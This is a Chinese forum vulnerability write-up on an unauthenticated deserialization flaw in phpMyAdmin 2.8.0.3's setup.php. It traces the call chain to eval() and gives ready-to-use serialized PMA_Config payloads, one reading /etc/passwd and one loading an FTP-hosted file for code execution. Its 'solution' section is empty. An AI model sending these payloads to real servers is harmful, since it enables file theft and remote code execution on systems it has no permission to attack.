论坛相关文章:PhpMyAdmin 2.8.0.3 版本无需登录任意文件包含导致代码执行(可getshell)漏洞分析
0x00 概述phpmyadmin存在漏洞的已知版本为 2.8.0.3 其余版本未知 本次测试的版本为2.8.0.3 许多内网的系统都在用这个版本,外网的也绝非少数! 0x01 漏洞分析看存在漏洞的文件代码 /scripts/setup.php 把传入的configuration给反序列化,而这个setup.php中引入了common.lib.php 来到common.lib.php: common.lib.php中引入了Config.class.php: 再看看Config.class.php: 继续看load方法: Config.class.php中含有__wakeup魔术方法,因此可以构造序列化参数,造成反序列化漏洞 所以整个思路就是: - setup.php->common.lib.php->Config.class.php->__wakeup()->load()->eval();
复制代码 0x02 漏洞利用PoC: - http://127.0.0.1/phpmyadmin2.8/scripts/setup.php
- configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test
复制代码 exp:
- http://localhost/phpmyadmin2/scripts/setup.php
- configuration=O:10:"PMA_Config":1:{s:6:"source";s:40:"ftp://test:test123@127.0.0.1/id.txt";}&action=test
复制代码
0x03 解决方案0x04 参考
|